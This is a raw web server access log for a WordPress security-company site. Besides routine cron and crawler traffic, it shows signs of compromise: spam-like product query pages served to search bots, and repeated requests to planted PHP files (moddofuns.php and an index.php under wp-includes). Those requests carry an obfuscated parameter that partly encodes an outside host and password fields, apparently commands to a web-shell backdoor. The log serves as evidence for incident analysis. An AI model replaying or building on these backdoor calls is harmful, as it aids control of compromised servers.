209.74.77.214 - - [14/Jul/2025:00:28:04 +0000] "POST /wp-cron.php?doing_wp_cron=1752452884.1342799663543701171875 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
51.222.253.5 - - [14/Jul/2025:00:28:02 +0000] "GET /?e=34316750011000&mod=18064d61&uri=info.php%3Fid%3D1145365-1056%26name%3Dguess+connect+c0002m2 HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.74.77.214 - - [14/Jul/2025:00:28:04 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=t7M6w5Dk4eF9vD5POP3lsZpdgu8g1koy&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.235 - - [14/Jul/2025:00:28:11 +0000] "GET /?e=17005443081000&mod=a01a0380&uri=form.php%3Fid%3D567690-39%26name%3Dhumanscale+freedom+low+back+draughtsman+chair HTTP/1.1" 200 21853 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [14/Jul/2025:00:28:15 +0000] "GET /?e=19678640051000&mod=b7c13b0a&uri=goods.php%3Fid%3D656899-751%26name%3Dbolsos+carrito+bebe+tuc+tuc HTTP/1.1" 200 20765 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [14/Jul/2025:00:29:33 +0000] "GET /?e=58141888061000&mod=b4d22bb5&uri=blog.php%3Fid%3D1940222-803%26name%3Dhaibike+nduro+2022 HTTP/1.1" 200 21874 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [14/Jul/2025:00:30:17 +0000] "GET /?e=107525369041000&mod=32508f53&uri=blog.php%3Fid%3D3588476-586%26name%3Dbomber+femme+wax HTTP/1.1" 200 21371 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [14/Jul/2025:00:30:52 +0000] "GET /?e=33171141091000&mod=a4c22565&uri=category-info.php%3Fid%3D1107131-1029%26name%3Dadidas+vintage+airliner+bag+mini HTTP/1.1" 200 21089 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [14/Jul/2025:00:31:29 +0000] "GET /?e=98786900071000&mod=5f2c22cb&uri=form.php%3Fid%3D3296769-72%26name%3Djtv+stackable+rings HTTP/1.1" 200 21186 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [14/Jul/2025:00:35:35 +0000] "GET /?e=58140088081000&mod=b4d22bb5&uri=us.php%3Fid%3D1940162-803%26name%3Dktm+super+adventure+1090+r HTTP/1.1" 200 22086 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.204.8.167 - - [14/Jul/2025:00:36:16 +0000] "GET /moddofuns.php HTTP/1.1" 200 28 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43"
209.74.77.214 - - [14/Jul/2025:00:38:14 +0000] "POST /wp-cron.php?doing_wp_cron=1752453493.9933149814605712890625 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
51.222.253.17 - - [14/Jul/2025:00:38:12 +0000] "GET /?e=37489442131000&mod=09dbc117&uri=category-info.php%3Fid%3D1251236-1118%26name%3Dfree+people+traveling+lace+sweater HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.74.77.214 - - [14/Jul/2025:00:38:14 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=NoiQXBpjlzt81BXevrvjTsl9TSen6PLf&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.233 - - [14/Jul/2025:00:39:20 +0000] "GET /?e=116493383001000&mod=c255c052&uri=shared.php%3Fid%3D3887794-387%26name%3Dbowflex+bxt6+price HTTP/1.1" 200 21852 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [14/Jul/2025:00:41:54 +0000] "GET /?e=58140868041000&mod=b4d22bb5&uri=brands.php%3Fid%3D1940188-803%26name%3Dxiaomi+himo+t1+prezzo HTTP/1.1" 200 21987 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [14/Jul/2025:00:44:04 +0000] "GET /?e=22653981011000&mod=069654d5&uri=form.php%3Fid%3D756159-183%26name%3Dused+xpulse HTTP/1.1" 200 22018 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [14/Jul/2025:00:46:18 +0000] "POST /wp-cron.php?doing_wp_cron=1752453978.0315330028533935546875 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.234 - - [14/Jul/2025:00:46:16 +0000] "GET /?e=99502539001000&mod=5c645cc1&uri=pin.php%3Fid%3D3320654-469%26name%3Dvintage+polo+shoes HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
209.74.77.214 - - [14/Jul/2025:00:46:18 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=6hMzJgyUU7aYpcos4pHBGWrmZEDo0hoP&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
209.74.77.214 - - [14/Jul/2025:00:47:32 +0000] "POST /wp-cron.php?doing_wp_cron=1752454052.6370329856872558593750 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
51.222.253.13 - - [14/Jul/2025:00:47:31 +0000] "GET /?e=3795890051000&mod=4ebd440d&uri=goods.php%3Fid%3D126703-236%26name%3D2003+nissan+frontier+timing+marks HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.74.77.214 - - [14/Jul/2025:00:47:32 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=VJ7zf67Fdm5spoHyhdgnFpgAhks1qnBx&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.235 - - [14/Jul/2025:00:47:37 +0000] "GET /?e=58141468001000&mod=b4d22bb5&uri=category-info.php%3Fid%3D1940208-803%26name%3Dyz+85+2022 HTTP/1.1" 200 22563 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [14/Jul/2025:00:48:05 +0000] "GET /?e=99502539001000&mod=5c645cc1&uri=pin.php%3Fid%3D3320654-469%26name%3Dvintage%20polo%20shoes HTTP/1.1" 200 26108 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.233 - - [14/Jul/2025:00:48:19 +0000] "GET /?e=4249126131000&mod=55a988df&uri=article.php%3Fid%3D141822-253%26name%3Dgozanti+cruiser+lego HTTP/1.1" 200 21388 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [14/Jul/2025:00:49:49 +0000] "GET /?e=102520601131000&mod=a14ac55a&uri=goods.php%3Fid%3D3421397-161%26name%3Dberne+high+country+hooded+jacket HTTP/1.1" 200 21934 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [14/Jul/2025:00:52:51 +0000] "GET /?e=58140628021000&mod=b4d22bb5&uri=products.php%3Fid%3D1940180-803%26name%3Dc20+himo+bike HTTP/1.1" 200 22585 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [14/Jul/2025:00:57:50 +0000] "POST /wp-cron.php?doing_wp_cron=1752454670.5597620010375976562500 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
51.222.253.3 - - [14/Jul/2025:00:57:49 +0000] "GET /?e=41023966001000&mod=5a38a1eb&uri=us.php%3Fid%3D1369157-893%26name%3Dyellow+earrings+and+necklace+set HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.74.77.214 - - [14/Jul/2025:00:57:50 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=V748zCnCtKaOdhXPXLJPuyXZwdbTDi4x&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.233 - - [14/Jul/2025:00:58:38 +0000] "GET /?e=58138948041000&mod=b4d22bb5&uri=itm.php%3Fid%3D1940124-803%26name%3D24+dirt HTTP/1.1" 200 22421 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [14/Jul/2025:00:58:59 +0000] "GET /?e=72312237011000&mod=cf3c6554&uri=us.php%3Fid%3D2413143-1442%26name%3Dexplorer+rolex+usato HTTP/1.1" 200 21271 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [14/Jul/2025:00:59:34 +0000] "GET /?e=4198399001000&mod=070dbb60&uri=category-info.php%3Fid%3D140129-252%26name%3Damazon+chic+jeans HTTP/1.1" 200 22224 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [14/Jul/2025:01:00:21 +0000] "GET /?e=52929868041000&mod=3fa14621&uri=itm.php%3Fid%3D1766316-394%26name%3Dsmeg+red+espresso+machine HTTP/1.1" 200 22722 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [14/Jul/2025:01:00:35 +0000] "GET /?e=38510510031000&mod=9ee70b79&uri=shared.php%3Fid%3D1285295-437%26name%3Dorthofeet+arch+support+slippers HTTP/1.1" 200 22538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.235 - - [14/Jul/2025:01:03:42 +0000] "GET /?e=50556053061000&mod=e0be0edc&uri=article.php%3Fid%3D1687146-934%26name%3Dair+jordan+vert+kaki HTTP/1.1" 200 22050 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [14/Jul/2025:01:04:09 +0000] "GET /?e=29845612011000&mod=c3f4db3a&uri=form.php%3Fid%3D996165-824%26name%3Dtoaster+oven+cookie+recipes HTTP/1.1" 200 22257 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.234 - - [14/Jul/2025:01:04:55 +0000] "GET /?e=58204832111000&mod=da11e8cd&uri=blog.php%3Fid%3D1942325-128%26name%3Draspberry+lemonade+juice HTTP/1.1" 200 22042 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [14/Jul/2025:01:06:23 +0000] "POST /wp-cron.php?doing_wp_cron=1752455183.0828599929809570312500 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.235 - - [14/Jul/2025:01:06:21 +0000] "GET /?e=58310843011000&mod=5f0ad4db&uri=pin.php%3Fid%3D1945863-949%26name%3Dleather+jacket+with+joggers HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
209.74.77.214 - - [14/Jul/2025:01:06:23 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=DwJjorJgwUeqUMZGeEMbvCh89o6sIdDi&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
209.74.77.214 - - [14/Jul/2025:01:07:36 +0000] "POST /wp-cron.php?doing_wp_cron=1752455256.2128429412841796875000 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
51.222.253.17 - - [14/Jul/2025:01:07:32 +0000] "GET /?e=50192059041000&mod=54843973&uri=us.php%3Fid%3D1675000-462%26name%3Dgpm+rc+parts HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.74.77.214 - - [14/Jul/2025:01:07:36 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=oaHFuDZdwFsMOAUZFQMSlRigZrmvNBxL&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.234 - - [14/Jul/2025:01:08:01 +0000] "GET /?e=58310843011000&mod=5f0ad4db&uri=pin.php%3Fid%3D1945863-949%26name%3Dleather%20jacket%20with%20joggers HTTP/1.1" 200 26107 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.235 - - [14/Jul/2025:01:10:00 +0000] "GET /?e=77461173011000&mod=28b9f8aa&uri=form.php%3Fid%3D2584951-523%26name%3Dtuta+felpata+adidas HTTP/1.1" 200 21859 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [14/Jul/2025:01:10:34 +0000] "POST /wp-cron.php?doing_wp_cron=1752455434.9533240795135498046875 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.234 - - [14/Jul/2025:01:10:33 +0000] "GET /?e=58317683051000&mod=c850371f&uri=article.php%3Fid%3D1946091-127%26name%3Dmobile+holder+for+study HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
209.74.77.214 - - [14/Jul/2025:01:10:35 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=yHHbjHdpTiuNba7KPixTcJqxhF7bxtSu&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.233 - - [14/Jul/2025:01:10:50 +0000] "GET /?e=58140508001000&mod=b4d22bb5&uri=form.php%3Fid%3D1940176-803%26name%3Dsanta+cruz+bullit+2021+usata HTTP/1.1" 200 22173 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.233 - - [14/Jul/2025:01:15:46 +0000] "GET /?e=58141588081000&mod=b4d22bb5&uri=pin.php%3Fid%3D1940212-803%26name%3Dktm+150+exc+tpi+2022 HTTP/1.1" 200 21839 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [14/Jul/2025:01:16:21 +0000] "POST /wp-cron.php?doing_wp_cron=1752455781.4680290222167968750000 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
209.74.77.214 - - [14/Jul/2025:01:16:21 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=184EOn2JV8R7aS3nDP775KWN1C9rVOB1&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.235 - - [14/Jul/2025:01:16:20 +0000] "GET /?e=58317683051000&mod=c850371f&uri=article.php%3Fid%3D1946091-127%26name%3Dmobile%20holder%20for%20study HTTP/1.1" 200 26121 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
51.222.253.5 - - [14/Jul/2025:01:16:40 +0000] "GET /?e=50683119061000&mod=299a23a2&uri=goods.php%3Fid%3D1691382-106%26name%3Dair+force+pastel+green HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.74.77.214 - - [14/Jul/2025:01:17:55 +0000] "GET /index.php/jk/ HTTP/1.1" 200 133829 "https://www.google.com" "Mozilla/5.0+(compatible;+Googlebot/2.1;++https://www.google.com/bot.html)"
209.74.77.214 - - [14/Jul/2025:01:18:04 +0000] "GET / HTTP/1.1" 200 123312 "https://www.google.com" "Mozilla/5.0+(compatible;+Googlebot/2.1;++https://www.google.com/bot.html)"
209.74.77.214 - - [14/Jul/2025:01:18:27 +0000] "GET /robots.txt HTTP/1.1" 200 174465 "https://www.google.com" "Mozilla/5.0+(compatible;+Googlebot/2.1;++https://www.google.com/bot.html)"
209.74.77.214 - - [14/Jul/2025:01:18:27 +0000] "GET /sitemap.xml HTTP/1.1" 200 1338 "https://www.google.com" "Mozilla/5.0+(compatible;+Googlebot/2.1;++https://www.google.com/bot.html)"
209.74.77.214 - - [14/Jul/2025:01:18:27 +0000] "GET /sitemap.xml HTTP/1.1" 200 1338 "https://www.google.com" "Mozilla/5.0+(compatible;+Googlebot/2.1;++https://www.google.com/bot.html)"
45.204.8.167 - - [14/Jul/2025:01:17:54 +0000] "GET /moddofuns.php?ARRAY=7o2230223n313735323435393436332p2231223n22687474703n5p2s5p2s6p776n39302r67756172652r77696o695p2s3s6p633q6175746s5s636s646526633q6148523063446s764p327833616n6o774p6q643159584n6p4p6r647061326o76267869616r5s64616r5s6r756q3q3526687474705s686s73743q63796265722q7365637572652r636s6q2r6175266n633q312668746163636573733q3126726s626s74733q31266175746s5s66696p655s6r616q653q6q6s64646s66756r732r706870266p61695s7975616r3q3126743q313735323435353836332q3963646139613961333030396433666134366638393334303030383638663261222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n226q6s64646s66756r732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q HTTP/1.1" 200 392 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
209.74.77.214 - - [14/Jul/2025:01:18:37 +0000] "POST /wp-cron.php?doing_wp_cron=1752455917.4209070205688476562500 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
45.204.8.167 - - [14/Jul/2025:01:18:36 +0000] "GET /favicon.ico HTTP/1.1" 302 - "https://cyber-secure.com.au/moddofuns.php?ARRAY=7o2230223n313735323435393436332p2231223n22687474703n5p2s5p2s6p776n39302r67756172652r77696o695p2s3s6p633q6175746s5s636s646526633q6148523063446s764p327833616n6o774p6q643159584n6p4p6r647061326o76267869616r5s64616r5s6r756q3q3526687474705s686s73743q63796265722q7365637572652r636s6q2r6175266n633q312668746163636573733q3126726s626s74733q31266175746s5s66696p655s6r616q653q6q6s64646s66756r732r706870266p61695s7975616r3q3126743q313735323435353836332q3963646139613961333030396433666134366638393334303030383638663261222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n226q6s64646s66756r732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
45.204.8.167 - - [14/Jul/2025:01:18:37 +0000] "GET /wp-includes/images/w-logo-blue-white-bg.png HTTP/1.1" 200 4119 "https://cyber-secure.com.au/moddofuns.php?ARRAY=7o2230223n313735323435393436332p2231223n22687474703n5p2s5p2s6p776n39302r67756172652r77696o695p2s3s6p633q6175746s5s636s646526633q6148523063446s764p327833616n6o774p6q643159584n6p4p6r647061326o76267869616r5s64616r5s6r756q3q3526687474705s686s73743q63796265722q7365637572652r636s6q2r6175266n633q312668746163636573733q3126726s626s74733q31266175746s5s66696p655s6r616q653q6q6s64646s66756r732r706870266p61695s7975616r3q3126743q313735323435353836332q3963646139613961333030396433666134366638393334303030383638663261222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n226q6s64646s66756r732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
209.74.77.214 - - [14/Jul/2025:01:18:37 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=POIAquI3WEMNQPL6LuRdt6rSSlVvcxw5&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.235 - - [14/Jul/2025:01:18:59 +0000] "GET /?e=58245660011000&mod=619205da&uri=pin.php%3Fid%3D1943687-233%26name%3Dcamperon+de+los+pumas+adidas HTTP/1.1" 200 39924 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
45.204.8.167 - - [14/Jul/2025:01:20:18 +0000] "GET /moddofuns.php?ARRAY=7o2230223n313735323435393631332p2231223n22687474703n5p2s5p2s6p776n39302r67756172652r77696o695p2s3s6p633q706p687426743q313735323435363031332q6263616638323139663632306163396162356539353939626563656336346463222p2232223n223462386430633165323536383232306665396362363964646335363339373935222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n226q6s64646s66756r732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q HTTP/1.1" 200 34 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
66.249.73.235 - - [14/Jul/2025:01:22:02 +0000] "GET /?e=58138288081000&mod=b4d22bb5&uri=dp.php%3Fid%3D1940102-803%26name%3Dbmc+twostroke+01+one+2022 HTTP/1.1" 200 39920 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.74.77.214 - - [14/Jul/2025:01:26:21 +0000] "POST /wp-cron.php?doing_wp_cron=1752456381.9457440376281738281250 HTTP/1.1" 200 - "-" "WordPress/6.8.1; https://cyber-secure.com.au"
51.222.253.19 - - [14/Jul/2025:01:26:20 +0000] "GET /?e=50750977001000&mod=f7bbcc6e&uri=dp.php%3Fid%3D1693644-1278%26name%3Dbackpack+brand+with+monkey HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
209.74.77.214 - - [14/Jul/2025:01:26:22 +0000] "POST /wp-admin/admin-ajax.php?action=async_litespeed&nonce=JjoE7A5LPUVxPkVFwKTJQoEByQTVatUK&litespeed_type=imgoptm HTTP/1.1" 200 21 "-" "WordPress/6.8.1; https://cyber-secure.com.au"
66.249.73.234 - - [14/Jul/2025:01:27:37 +0000] "GET /?e=23926674031000&mod=b4d22bb5&uri=form.php%3Fid%3D798606-803%26name%3Dcambio+bici+corsa+campagnolo HTTP/1.1" 200 40067 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.73.233 - - [14/Jul/2025:01:28:17 +0000] "GET /?e=58140448021000&mod=b4d22bb5&uri=form.php%3Fid%3D1940174-803%26name%3Dcanyon+lux+trail+cf HTTP/1.1" 200 40033 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
45.204.8.167 - - [14/Jul/2025:01:33:28 +0000] "GET /wp-includes/blocks/video/video/index.php?ARRAY=7o2230223n313735323436303430312p2231223n22687474703n5p2s5p2s6p776n39302r67756172652r77696o695p2s3s6p633q78696164616r5s72616r645s7061746826743q313735323435363830312q3665343231313234316530666332306536633939656637663864356334313834222p2232223n223130663337313063376261663433333731363033343061646366663963383739222p2233223n226166643066333032373064613330303536656335306131613039343336613433222p226175746s5s66696p655s6r616q65223n226q6s64646s66756r732r706870222p226175746s5s70617373223n2232322q35302q35382q36332q37342q39302q3135222p2262696r675s70617373223n2232332q33352q35332q36342q37332q38322q3235222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q HTTP/1.1" 200 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
